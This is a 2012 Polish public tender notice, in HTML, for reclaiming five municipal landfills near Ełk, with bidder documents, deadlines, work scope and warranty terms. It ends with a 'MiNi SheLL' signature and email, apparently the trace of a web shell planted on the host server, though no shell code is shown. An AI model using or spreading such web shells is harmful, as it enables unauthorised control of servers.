<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy 1a. do SIWZ dot. części I - jeśli wykonawca składa ofertę w części I,
2. Formularz ofertowy 1b. do SIWZ dot. części II - jeśli wykonawca składa ofertę w części II,
3. Formularz ofertowy 1c. do SIWZ dot. części III - jeśli wykonawca składa ofertę w części III,
4. Formularz ofertowy 1d. do SIWZ dot. części IV - jeśli wykonawca składa ofertę w części IV,
5. Formularz ofertowy 1e. do SIWZ dot. części V - jeśli wykonawca składa ofertę w części V.
6. Dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę sposobu wykonania przedmiotu zawartej umowy w następujących okolicznościach:
- w przypadku modyfikacji przedmiotu zamówienia w związku z wystąpieniem robót dodatkowych lub zamiennych wprowadzonych na wniosek Zamawiającego,
- w przypadku konieczności usunięcia błędów lub wprowadzenie zmian w dokumentacji technicznej. 
2. Zmianę terminu umowy dopuszcza się w przypadku:
- wydłużonego terminu postępowania przetargowego,
- wystąpienia robót dodatkowych, 
- warunków atmosferycznych odbiegających od typowych dla pory roku, uniemożliwiających      prowadzenie robót budowlanych.
  - działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
3. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://elk-ekomazury.bip-wm.pl/public/?id=98033<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Związek Międzygminny Gospodarka Komunalna, ul. Marsz. J. Piłsudskiego 2, 19-300 Ełk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2012 godzina 09:00, miejsce: Związek Międzygminny Gospodarka Komunalna, ul. Marsz. J. Piłsudskiego 2, 19-300 Ełk (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedsięwzięcie dofinansowano ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rekultywacja składowiska odpadów komunalnych w m. Niedźwiedzkie gm. Wieliczki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część I - Rekultywacja składowiska odpadów komunalnych w m. Niedźwiedzkie gm. Wieliczki.
1.1. Wykonanie rekultywacji technicznej:
a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na składowisku odpadów, uwzględniając osiadanie złoża odpadów, ze spadkami od 1,0 do 3,7 % na zewnątrz w kierunku skarp.
b) wykonanie odgazowania składowiska,
         c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm warstwy glebotwórczej z humusu, piasku próchnicznego lub kompostu,
1.2. Wykonanie rekultywacji biologicznej:
             Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska poprzez zabieg zadarniania.
1.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska:
          a) brodzika dezynfekcyjnego wykonanego z żelbetu,
          b) tablicy informacyjnej o konstrukcji metalowej,
          c) ogrodzenia siatki na słupach betonowych,
          d) 2 bram wjazdowych o konstrukcji metalowej,
          e) słupy żelbetowe po starej oczyszczalni,
          f) obwałowań ze starej oczyszczalni ścieków,
          g) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za zdemontowanym ogrodzeniem z siatki.
1.4.Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.
1.5.Szczegółowy zakres prac określa dokumentacja techniczna stanowiąca załącznik nr 8a. do SIWZ oraz decyzje Starosty, w tym zmieniające. 

2. Załączone do SIWZ przedmiary nie stanowią podstawy późniejszego  rozliczenia umowy - umowa jest ryczałtowa tj. jej cena nie ulega zmianie w trakcie realizacji zadania. 
W cenie oferty należy uwzględnić koszty wykonania inwentaryzacji powykonawczej oraz inwentaryzacji  roboczej (wykonanej przez uprawnionego geodetę) po wykonaniu każdej z warstw rekultywacji, wykonania ewentualnych robót, które nie zostały ujęte w przedmiarze, a które należy wykonać zgodnie z dokumentacją techniczną, decyzjami Starosty - w tym decyzjami zmieniającymi - opisem przedmiotu zamówienia zawartym w SIWZ oraz na podstawie przeprowadzonej wizji lokalnej w miejscu planowanych robót. Każdy z oferentów winien odwiedzić miejsce wykonywania robót celem sprawdzenia warunków związanych z wykonywaniem prac będących przedmiotem przetargu oraz celem uzyskania dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia w załączonym przedmiarze robót elementów niezbędnych do wykonania umowy, a wynikających z załączonej dokumentacji. Proces zakrzewienia terenów podlegających rekultywacji  następować będzie samoczynnie, roślinnością pochodzącą z otoczenia i zamawiający nie wymaga dodatkowego zakrzewiania przez wykonawcę. 
Wykonawca wyłoniony w ramach każdej z części niniejszego postępowania zobowiązany będzie do przedłożenia Zamawiającemu, przed podpisaniem umowy, kosztorysu ofertowego  oraz kopii opłaconej polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej:
a)	dla części I - 120 tys. zł
3. Okres gwarancji   - 36 miesięcy od daty odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.30-7, 45.22.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rekultywacja składowiska odpadów komunalnych w m. Stare Juchy gm. Stare Juchy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część II - Rekultywacja składowiska odpadów komunalnych w m. Stare Juchy gm. Stare Juchy.
1.1. Wykonanie rekultywacji technicznej:
    a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na  składowisku odpadów,  uwzględniając osiadanie złoża odpadów, ze spadkiem 2,5 % na zewnątrz.
    b)  wykonanie odgazowania składowiska, 
    c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm    warstwy   glebotwórczej z humusu, piasku próchnicznego lub kompostu,
   d)   wykonanie 3 stałych piezometrów o głębokości 28,0 m każdy.
1.2.  Wykonanie rekultywacji biologicznej:
             Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska poprzez zabieg zadarniania.
1.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska:
          a)  tablicy informacyjnej o konstrukcji metalowej,
          b)  bramy wjazdowej o konstrukcji metalowej,
          c)  kontenerów na surowce wtórne,
          d) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za granicą terenu składowiska.
1.4.Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.
 1.5.Szczegółowy zakres prac określa dokumentacja techniczna stanowiąca załącznik nr 8b. do SIWZ oraz decyzje Starosty, w tym zmieniające. Jednocześnie zamawiający informuje, iż do wyceny oferty nie należy ujmować rozbiórki wskazanego w dokumentacji technicznej budynku gospodarczego.

2. Załączone do SIWZ przedmiary nie stanowią podstawy późniejszego  rozliczenia umowy - umowa jest ryczałtowa tj. jej cena nie ulega zmianie w trakcie realizacji zadania. 
W cenie oferty należy uwzględnić koszty wykonania inwentaryzacji powykonawczej oraz inwentaryzacji  roboczej (wykonanej przez uprawnionego geodetę) po wykonaniu każdej z warstw rekultywacji, wykonania ewentualnych robót, które nie zostały ujęte w przedmiarze, a które należy wykonać zgodnie z dokumentacją techniczną, decyzjami Starosty - w tym decyzjami zmieniającymi - opisem przedmiotu zamówienia zawartym w SIWZ oraz na podstawie przeprowadzonej wizji lokalnej w miejscu planowanych robót. Każdy z oferentów winien odwiedzić miejsce wykonywania robót celem sprawdzenia warunków związanych z wykonywaniem prac będących przedmiotem przetargu oraz celem uzyskania dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia w załączonym przedmiarze robót elementów niezbędnych do wykonania umowy, a wynikających z załączonej dokumentacji. Proces zakrzewienia terenów podlegających rekultywacji  następować będzie samoczynnie, roślinnością pochodzącą z otoczenia i zamawiający nie wymaga dodatkowego zakrzewiania przez wykonawcę. 
Wykonawca wyłoniony w ramach każdej z części niniejszego postępowania zobowiązany będzie do przedłożenia Zamawiającemu, przed podpisaniem umowy, kosztorysu ofertowego  oraz kopii opłaconej polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 90 tys. zł
3. Okres gwarancji  - 36 miesięcy od daty odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.30-7, 45.22.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rekultywacja składowiska odpadów komunalnych w m. Stożne gm. Kowale Oleckie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część III - Rekultywacja składowiska odpadów komunalnych w m. Stożne gm. Kowale Oleckie
 1.1. Wykonanie rekultywacji technicznej:
          a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na  składowisku    odpadów,  uwzględniając osiadanie złoża odpadów, ze spadkiem 0,5% do 5% na zewnątrz w kierunku południowo - wschodnim,
          b) wykonanie odgazowania składowiska,
          c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm warstwy   glebotwórczej z humusu, piasku próchnicznego lub kompostu,
1.2. Wykonanie rekultywacji biologicznej:
             Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska  poprzez zabieg zadarniania.
1.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska:
          a) tablicy informacyjnej o konstrukcji metalowej,
          b) budynku gospodarczego,
          c) ogrodzenia z siatki na słupach stalowych,
          d) brama wjazdowa o konstrukcji metalowej,
          e) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za zdemontowanym ogrodzeniem z siatki.
1.4. Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.
1.5.Szczegółowy zakres prac określa dokumentacja techniczna stanowiąca załącznik nr 8c. do SIWZ oraz decyzje Starosty, w tym zmieniające.

2. Załączone do SIWZ przedmiary nie stanowią podstawy późniejszego  rozliczenia umowy - umowa jest ryczałtowa tj. jej cena nie ulega zmianie w trakcie realizacji zadania. 
W cenie oferty należy uwzględnić koszty wykonania inwentaryzacji powykonawczej oraz inwentaryzacji  roboczej (wykonanej przez uprawnionego geodetę) po wykonaniu każdej z warstw rekultywacji, wykonania ewentualnych robót, które nie zostały ujęte w przedmiarze, a które należy wykonać zgodnie z dokumentacją techniczną, decyzjami Starosty - w tym decyzjami zmieniającymi - opisem przedmiotu zamówienia zawartym w SIWZ oraz na podstawie przeprowadzonej wizji lokalnej w miejscu planowanych robót. Każdy z oferentów winien odwiedzić miejsce wykonywania robót celem sprawdzenia warunków związanych z wykonywaniem prac będących przedmiotem przetargu oraz celem uzyskania dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia w załączonym przedmiarze robót elementów niezbędnych do wykonania umowy, a wynikających z załączonej dokumentacji. Proces zakrzewienia terenów podlegających rekultywacji  następować będzie samoczynnie, roślinnością pochodzącą z otoczenia i zamawiający nie wymaga dodatkowego zakrzewiania przez wykonawcę. 
Wykonawca wyłoniony w ramach każdej z części niniejszego postępowania zobowiązany będzie do przedłożenia Zamawiającemu, przed podpisaniem umowy, kosztorysu ofertowego  oraz kopii opłaconej polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 260 tys. zł
3. Okres gwarancji  - 36 miesięcy od daty odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.30-7, 45.22.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rekultywacja składowiska odpadów komunalnych w m. Świętajno gm. Świętajno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Część IV - Rekultywacja składowiska odpadów komunalnych w m. Świętajno gm. Świętajno.
1.1. Wykonanie rekultywacji technicznej:
a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na  składowisku    odpadów,  uwzględniając osiadanie złoża odpadów, ze spadkiem 2, 5 % na zewnątrz w kierunku północno-wschodnim,
b) wykonanie odgazowania składowiska,
c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm warstwy   glebotwórczej z humusu, piasku próchnicznego lub kompostu, 
1.2. Wykonanie rekultywacji biologicznej:
Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska  poprzez zabieg zadarniania.
1.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska:
          a) brodzika dezynfekcyjnego,
         b) tablicy informacyjnej o konstrukcji metalowej,
         c) ogrodzenia z siatki na słupach betonowych,
         d) bramy wjazdowej o konstrukcji metalowej o długości 4 m,
         e) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za zdemontowanym ogrodzeniem z siatki.

1.4.Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.

1.5.Szczegółowy zakres prac określa dokumentacja techniczna stanowiąca załącznik nr 8d do SIWZ oraz decyzje Starosty, w tym zmieniające.
2. Załączone do SIWZ przedmiary nie stanowią podstawy późniejszego  rozliczenia umowy - umowa jest ryczałtowa tj. jej cena nie ulega zmianie w trakcie realizacji zadania. 
W cenie oferty należy uwzględnić koszty wykonania inwentaryzacji powykonawczej oraz inwentaryzacji  roboczej (wykonanej przez uprawnionego geodetę) po wykonaniu każdej z warstw rekultywacji, wykonania ewentualnych robót, które nie zostały ujęte w przedmiarze, a które należy wykonać zgodnie z dokumentacją techniczną, decyzjami Starosty - w tym decyzjami zmieniającymi - opisem przedmiotu zamówienia zawartym w SIWZ oraz na podstawie przeprowadzonej wizji lokalnej w miejscu planowanych robót. Każdy z oferentów winien odwiedzić miejsce wykonywania robót celem sprawdzenia warunków związanych z wykonywaniem prac będących przedmiotem przetargu oraz celem uzyskania dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia w załączonym przedmiarze robót elementów niezbędnych do wykonania umowy, a wynikających z załączonej dokumentacji. Proces zakrzewienia terenów podlegających rekultywacji  następować będzie samoczynnie, roślinnością pochodzącą z otoczenia i zamawiający nie wymaga dodatkowego zakrzewiania przez wykonawcę. 
Wykonawca wyłoniony w ramach każdej z części niniejszego postępowania zobowiązany będzie do przedłożenia Zamawiającemu, przed podpisaniem umowy, kosztorysu ofertowego  oraz kopii opłaconej polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 435 tys. zł
3. Okres gwarancji  - 36 miesięcy od daty odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.30-7, 45.22.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Rekultywacja składowiska odpadów komunalnych w m. Wiśniowo Ełckie gm. Prostki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.  Część V - Rekultywacja składowiska odpadów komunalnych w m. Wiśniowo Ełckie gm. Prostki.
1.1. Wykonanie rekultywacji technicznej:
a) formowanie kształtu czaszy (wierzchowiny) przy użyciu zdeponowanych na  składowisku    odpadów, uwzględniając osiadanie złoża odpadów, ze spadkiem 2, 5 % na zewnątrz w kierunku północno-wschodnim,
b) wykonanie odgazowania składowiska,
c) wykonanie 30 cm warstwy podglebia z gruntu inertnego oraz wykonanie 20 cm warstwy   glebotwórczej z humusu, piasku próchnicznego lub kompostu, 
1.2. Wykonanie rekultywacji biologicznej:
Rekultywacja biologiczna obejmuje kształtowanie zabudowy roślinnej składowiska  poprzez zabieg zadarniania.
1.3. Na etapie rekultywacji technicznej, obiekty towarzyszące, jako zbędne, należy zlikwidować. W ramach przygotowania terenu należy dokonać demontażu, rozbiórki i wywiezienia następujących elementów wyposażenia składowiska: 
a) tablicy informacyjnej o konstrukcji metalowej;
b) ogrodzenia z siatki na słupach stalowych;
c) dwie bramy wjazdowe o konstrukcji metalowej o długości 4 m;
d) 4 boksów murowanych z cegły w tym jeden zadaszony (blacha falista na konstrukcji stalowej)
e) oświetlenie terenu składowiska.
       
          oraz: 
         a) budynek gospodarczy należy przenieść w miejsce wskazane przez Zarządcę składowiskiem, 
         b) trylinkę z rozbiórki nawierzchni wywieźć w miejsce wskazane przez Zarządzającego,
         c) oczyszczenie z pozostałości odpadów terenu składowiska oraz w odległości minimum  50 m za zdemontowanym ogrodzeniem z siatki.

1.4. Pielęgnacja roślinności przez okres gwarancji w sposób określony w dokumentacji technicznej.
1.5.5.Szczegółowy zakres prac określa projekt dokumentacja techniczna stanowiąca      załącznik nr 8e. do SIWZ oraz decyzje Starosty, w tym zmieniające.

2. Załączone do SIWZ przedmiary nie stanowią podstawy późniejszego  rozliczenia umowy - umowa jest ryczałtowa tj. jej cena nie ulega zmianie w trakcie realizacji zadania. 
W cenie oferty należy uwzględnić koszty wykonania inwentaryzacji powykonawczej oraz inwentaryzacji  roboczej (wykonanej przez uprawnionego geodetę) po wykonaniu każdej z warstw rekultywacji, wykonania ewentualnych robót, które nie zostały ujęte w przedmiarze, a które należy wykonać zgodnie z dokumentacją techniczną, decyzjami Starosty - w tym decyzjami zmieniającymi - opisem przedmiotu zamówienia zawartym w SIWZ oraz na podstawie przeprowadzonej wizji lokalnej w miejscu planowanych robót. Każdy z oferentów winien odwiedzić miejsce wykonywania robót celem sprawdzenia warunków związanych z wykonywaniem prac będących przedmiotem przetargu oraz celem uzyskania dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia w załączonym przedmiarze robót elementów niezbędnych do wykonania umowy, a wynikających z załączonej dokumentacji. Proces zakrzewienia terenów podlegających rekultywacji  następować będzie samoczynnie, roślinnością pochodzącą z otoczenia i zamawiający nie wymaga dodatkowego zakrzewiania przez wykonawcę. 
Wykonawca wyłoniony w ramach każdej z części niniejszego postępowania zobowiązany będzie do przedłożenia Zamawiającemu, przed podpisaniem umowy, kosztorysu ofertowego  oraz kopii opłaconej polisy ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 290 tys. zł 
3. Okres gwarancji   - 36 miesięcy od daty odbioru końcowego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.23.30-7, 45.22.21.10-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com